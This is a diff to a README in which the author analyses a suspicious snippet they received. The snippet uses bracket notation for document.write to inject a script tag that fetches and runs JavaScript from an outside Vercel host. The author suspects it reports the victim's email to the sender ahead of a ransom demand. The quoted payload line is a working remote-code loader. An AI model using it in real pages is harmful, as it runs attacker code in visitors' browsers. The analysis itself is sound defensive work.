Lecostarius/virus/README.md

 document[write](<script>"https://fictional-dmk.vercel.app/"></script>)

-Since 'document[write](xyz)' is the same as 'document.write(xyz)', this will cause the browser to insert the script tag in parentheses into the current HTML document, fetch the javascript from fictional-dmk.vercel.app, and execute it.
+Since 'document\[write\](xyz)' is the same as 'document.write(xyz)', this will cause the browser to insert the script tag in parentheses into the current HTML document, fetch the javascript from fictional-dmk.vercel.app, and execute it.
 No doubt said javascript code would then contain a part that evaluates my email adress by reading the variable 'h' and likely report back to the owner of this thing that I am infected and ready to receive a 'pay ransom or your files stay encrypted' mail or similar.